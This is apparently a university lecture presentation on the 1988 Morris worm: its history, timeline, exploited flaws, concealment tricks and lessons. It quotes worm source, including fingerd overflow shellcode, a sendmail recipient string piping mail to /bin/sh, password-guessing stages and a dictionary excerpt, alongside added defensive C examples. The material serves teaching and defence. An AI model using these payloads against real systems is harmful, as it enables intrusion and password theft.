
Page 1

The Internet Worm of 1988

Svetlana V. Drachova-Strang, Clemson University

CPSC 681, April 25, 2006

“There may be a virus loose on the internet” (Andy Sudduth of Harvard, 34 minutes after midnight, Nov. 3, 1988)

Page 2

Creator and His Creation

November 2nd, 1988: Robert Tappan Morris, a 23-year-old CS student from Cornell, released a worm from MIT.

Aside: he is the son of Robert Morris, Sr., Chief Scientist at the National Computer Security Center, a subdivision of the NSA.

The Morris worm: consisted of several files of cleverly written C code

Intentions: probe the size of the Internet with a self-replicating program?

Effects:

-- Internet down

-- Thousands of machines disconnected from the Internet

-- Worm on the loose

Page 3

What the worm DID NOT do:

Did not cause physical damage to computer systems.

Did not alter or destroy system or user files

Did not affect machines running OSs other than VAX or BSD Unix

Did not save or transmit the cracked passwords

Did not attempt to gain superuser access

Did not plant any trojans or timebombs

Did not attack machines that were not attached to the internet

Page 4

What the worm DID:

Self-propagated through Internet infecting and reinfecting machines

Self-replicated unstoppably

Exploited several vulnerabilities: fingerd, sendmail, passwords

Had flaws that made it especially destructive and/or impaired its intended functionality

Cracked user passwords

Disguised itself by several clever means

Page 5

History and Origins

“Worms were good at first”: Noble usage

1975: “tapeworm” John Brunner’s The Shockwave Rider

early 1980s: John Shoch and Jon Hupp created five worms for executing helpful tasks on the internet (billboard worm, vampire worm, etc.): “a useful way to run distributed diagnostics”

Mishap and the first lesson learned

Conclusions

“We have the tools at hand to experiment with distributed computations in their fullest form: dynamically allocating resources and moving from machine to machine. Furthermore, local networks supporting relatively large numbers of hosts now provide a rich environment for this kind of experimentation. The basic worm programs described here demonstrate the ease with which these mechanisms can be explored…” (J. Shoch, J. Hupp)

Page 6

The Horrible Night

6:00 PM The Worm is launched

8:49 PM The Worm infects a VAX-8600 at the University of Utah

9:09 PM The Worm initiates the first attack to infect others

9:21 PM Load average on the system reaches 5 (should be about 1)

9:41 PM Load average reaches 7

10:01 PM Load average reaches 16

10:06 PM No new processes can be started. System unusable

10:20 PM System administrator kills off the worms

10:41 PM System is reinfected, load average reaches 27

10:49 PM System administrator shuts down and restarts the system

11:21 PM Reinfestation causes load average to reach 37.

Page 7

fingerd Vulnerability Exploited

fingerd reads its request into a 512-character buffer with no bounds check.

The worm calls write() with a 536-character argument plus a newline. The extra 6 words overwrite the stack frame, including the return PC, so that control lands in a system-call sequence equivalent to execve("/bin/sh"), which is then used to install the worm on the target system.

char buf[536] = "\335\217/sh\0\335\217/bin\320^Z\335\0\335\0\335Z\335\003 \320^\\\274;\344\371\344\342\241\256\343\350\357\256\362\351";

/* Rewrite part of the stack frame */
l556 = 0x7fffe9fc;
l560 = 0x7fffe8a8;
l564 = 0x7fffe8bc;
l568 = 0x28000000;
l552 = 0x0001c020;

#ifdef sun
/* Reverse the word order for the Sun machines */
l556 = byte_swap(l556);
l560 = byte_swap(l560);
l564 = byte_swap(l564);
l568 = byte_swap(l568);
l552 = byte_swap(l552);
#endif sun

write(s, buf, sizeof(buf)); /* sizeof == 536 */
write(s, XS("\n"), 1);
sleep(5);
if (test_connection(s, s, 10)) {
    *fd1 = s;
    *fd2 = s;
    return 1;
}
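The fix that closed this hole was a bounded read in place of fingerd's unbounded gets(). The following is an added illustration, not code from the worm or from BSD fingerd: finger_read_request is the hardened reader, and demo_overlong_then_normal feeds it a constructed 536-byte request (the length on the slide) followed by a normal one, showing that the overflow bytes are discarded and the stream stays in sync. fmemopen and the 512-byte size are assumptions for the demonstration.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

#define FINGER_BUF 512   /* fingerd's buffer size, as stated on the slide */

/* Bounded replacement for the gets() call in fingerd. Reads one request line
 * into buf (capacity n), strips the newline, and discards the rest of an
 * overlong line so the excess bytes never reach the stack. Returns the number
 * of bytes kept, or -1 on EOF with no data.
 * The vulnerable pattern, for contrast (not compiled here):
 *     char line[512];
 *     gets(line);   // no bound: a 536-byte request overwrites the return PC
 */
int finger_read_request(FILE *in, char *buf, size_t n) {
    if (fgets(buf, (int)n, in) == NULL) return -1;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[--len] = '\0';
    } else {
        int c;  /* line exceeded the buffer: drain the remainder */
        while ((c = fgetc(in)) != EOF && c != '\n') ;
    }
    return (int)len;
}

/* Feed a constructed, non-empty request string through the reader. */
int finger_read_from_string(const char *req, char *buf, size_t n) {
    FILE *f = fmemopen((void *)req, strlen(req), "r");
    if (f == NULL) return -1;
    int r = finger_read_request(f, buf, n);
    fclose(f);
    return r;
}

/* Constructed stream: a 536-byte request followed by a normal one. Returns the
 * bytes kept from the first line; *second_len receives the second line's
 * length, showing the drain kept the stream in sync (second request intact). */
int demo_overlong_then_normal(int *second_len) {
    char req[544], buf[FINGER_BUF];
    memset(req, 'A', 536);
    memcpy(req + 536, "\nbob\n", 6);
    FILE *f = fmemopen(req, strlen(req), "r");
    if (f == NULL) return -1;
    int first = finger_read_request(f, buf, sizeof buf);
    *second_len = finger_read_request(f, buf, sizeof buf);
    fclose(f);
    return first;
}
```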

Page 8

sendmail Vulnerability Exploited

sendmail DEBUG flaw: the DEBUG mode allows mail to be delivered to a process instead of to a user.

The worm sends a message in DEBUG mode to a cleverly built recipient string.

The recipient string sets up a command that deletes the message header and passes the body to the command interpreter. The body compiles code that opens a connection back to the attacking host and fetches a copy of the worm.

#define MAIL_FROM "mail from:</dev/null>\n"
#define MAIL_RCPT "rcpt to:<\"| sed \'1,/^$/d\' | /bin/sh ; exit 0\">\n"

send_text(s, XS(MAIL_FROM));
sprintf(l548, XS(MAIL_RCPT), i, i);
send_text(s, l548);
send_text(s, XS("data\n"));
compile_slave(host, s, saddr);
send_text(s, XS("\n.\n"));
send_text(s, XS("quit\n"));
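The tell-tale of this attack on the wire is an RCPT TO whose address is a quoted "|command" pipe rather than a mailbox. As an added example (not part of the presentation or of sendmail), rcpt_targets_program recognises such a recipient and count_program_recipients runs it over a constructed SMTP session transcript built from the MAIL_FROM/MAIL_RCPT strings above; the session text and the 256-byte line limit are assumptions.

```c
#include <ctype.h>
#include <string.h>
#include <strings.h>

/* Returns 1 when an SMTP "RCPT TO:" line names a program (a quoted "|command"
 * address, as in the worm's MAIL_RCPT string) rather than a mailbox, 0 for any
 * other line. The line is NUL-terminated; SMTP keywords are case-insensitive. */
int rcpt_targets_program(const char *line) {
    const char *p = line;
    while (isspace((unsigned char)*p)) p++;
    if (strncasecmp(p, "rcpt to:", 8) != 0) return 0;
    p += 8;
    while (isspace((unsigned char)*p)) p++;
    if (*p == '<') p++;
    while (isspace((unsigned char)*p)) p++;
    if (*p == '"') p++;
    while (isspace((unsigned char)*p)) p++;
    return *p == '|';
}

/* Scan a session transcript (one SMTP command per line) and return how many
 * RCPT commands point at a program; a count above zero is what a mail-log
 * monitor would alert on. */
int count_program_recipients(const char *session) {
    int hits = 0;
    const char *start = session;
    while (*start) {
        const char *end = strchr(start, '\n');
        size_t len = end ? (size_t)(end - start) : strlen(start);
        char line[256];
        if (len >= sizeof line) len = sizeof line - 1;  /* truncate long lines */
        memcpy(line, start, len);
        line[len] = '\0';
        hits += rcpt_targets_program(line);
        start = end ? end + 1 : start + strlen(start);
    }
    return hits;
}

/* Constructed transcript reproducing the worm's SMTP exchange from the slide. */
const char *constructed_session =
    "helo attacker.example\n"
    "mail from:</dev/null>\n"
    "rcpt to:<\"| sed '1,/^$/d' | /bin/sh ; exit 0\">\n"
    "data\n";
```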

Page 9

Password Cracking

Exploited 2 vulnerabilities:

System: /etc/passwd file

User: weak passwords

The attack has 4 stages:

0: seek other machines to infect from /etc/hosts.equiv and /.rhosts

1: obvious password guesses (35% success)

2: worm’s internal dictionary

3: system’s online dictionary in /usr/dict/words
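Seen from the defender's side, the three guessing stages define a minimum password policy: anything the worm would have guessed should be rejected at the time it is set. The following is an added example, not part of the presentation: weak_password_stage returns the stage (1 to 3) at which a candidate password would fall, or 0 if it survives all three. The stage-1 guesses (empty, the user name, the name doubled, the name reversed) and the two tiny word lists standing in for the worm's dictionary and /usr/dict/words are assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Constructed stand-ins: a few words from the worm's internal list (stage 2)
 * and a tiny substitute for /usr/dict/words (stage 3). */
static const char *const internal_words[] = {"academia", "batman", "wizard", "wombat", 0};
static const char *const system_words[] = {"apple", "orange", "zebra", 0};

/* Lower-case copy of src into dst, which has room for n bytes. */
static void lower_copy(char *dst, const char *src, size_t n) {
    size_t i;
    for (i = 0; i + 1 < n && src[i]; i++) dst[i] = (char)tolower((unsigned char)src[i]);
    dst[i] = '\0';
}

static void reverse_in_place(char *s) {
    for (size_t i = 0, j = strlen(s); i + 1 < j; i++, j--) {
        char t = s[i]; s[i] = s[j - 1]; s[j - 1] = t;
    }
}

static int in_list(const char *const *list, const char *w) {
    for (; *list; list++) if (strcmp(*list, w) == 0) return 1;
    return 0;
}

/* Returns 0 if the password survives all three guessing stages, otherwise the
 * stage (1..3) at which it would have been guessed. Comparisons ignore case,
 * since the worm tried case variants of its words. */
int weak_password_stage(const char *user, const char *pw) {
    char u[64], p[64], tmp[128];
    lower_copy(u, user, sizeof u);
    lower_copy(p, pw, sizeof p);
    /* Stage 1: obvious guesses derived from the account itself. */
    if (p[0] == '\0' || strcmp(p, u) == 0) return 1;
    snprintf(tmp, sizeof tmp, "%s%s", u, u);
    if (strcmp(p, tmp) == 0) return 1;
    strcpy(tmp, u);
    reverse_in_place(tmp);
    if (strcmp(p, tmp) == 0) return 1;
    /* Stage 2: the worm's built-in dictionary. */
    if (in_list(internal_words, p)) return 2;
    /* Stage 3: the system's online dictionary. */
    if (in_list(system_words, p)) return 3;
    return 0;
}
```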

Page 10

Worm’s dictionary

char *wds[ ] = /* 0x21a74 */

{"academia", "aerobics", "airplane", "albany", "albatross", "albert", "alex", "alexander", "algebra", "aliases", "alphabet", "amorphous", "analog", "anchor", "andromache", "animals", "answer", "anthropogenic", "anvils", "anything", "aria", "ariadne", "arrow", "arthur", "athena", "atmosphere", "aztecs", "azure", "bacchus", "bailey", "banana", "bananas", "bandit", "banks", "barber", "baritone", "bass", "bassoon", "batman", "beater", "beauty", "beethoven", "beloved", "benz", "beowulf", "berkeley", "berliner", "beryl", "beverly", "bicameral", "brenda", "brian", "bridget", "broadway", "bumbling", "burgess", "campanile", "cantor", "cardinal",

. . . "tarragon", "taylor", "telephone", "temptation", "thailand", "tiger", "toggle", "tomato", "topography", "tortoise", "toyota", "trails", "trivial", "trombone", "tubas", "tuttle", "umesh", "unhappy", "unicorn", "unknown", "urchin", "utility", "vasant", "vertigo", "vicky", "village", "virginia", "warren", "water", "weenie", "whatnot", "whiting", "whitney", "will", "william", "williamsburg", "willie", "winston", "wisconsin", "wizard", "wombat", "woodwind", "wormwood", "yacov", "yang", "yellowstone", "yosemite", "zimmerman", 0

};

/* contained 421 words */

Page 11

Concealing Itself

Renamed itself to sh, which is also the name of the Bourne shell:

strcpy(argv[0], XS("sh"));

Set core dump size to zero:

rl.rlim_cur = 0;
rl.rlim_max = 0;
if (setrlimit(RLIMIT_CORE, &rl)) ;

Killed its parent process and changed its process id

Used encryption to obscure its strings (the XS() wrapper seen in the code above)

Page 12

Oops, … The Worm Had Flaws

Major flaws in the program code:

only ≈14% chance that the worm will check if the target system has already been infected

1 in 7 chance (instead of the intended 1 in 10,000) that a listening worm would not listen for a pleasequit() signal

Called sendto() on a TCP socket instead of a UDP socket when sending 1 byte of data from each infected machine to the originating Berkeley machine, 128.32.137.13, port 11357

There were other flaws as well

Page 13

Worm Map

[from http://snowplow.org/tom/worm/history.html]

Page 14

Complex Logic of the Worm

Page 15

Lessons Learned

The Morris Worm was the first worm to bring the Internet down

A worm is a powerful tool capable of inflicting a lot of damage

Computer crime is punishable under the Computer Fraud and Abuse Act of 1986.

Later, Mr. Morris himself stated that the incident “has raised the public awareness to a considerable degree”. [R. H. Morris, quoted in the New York Times, 11/5/88]

System administrators increased their efforts in protecting their systems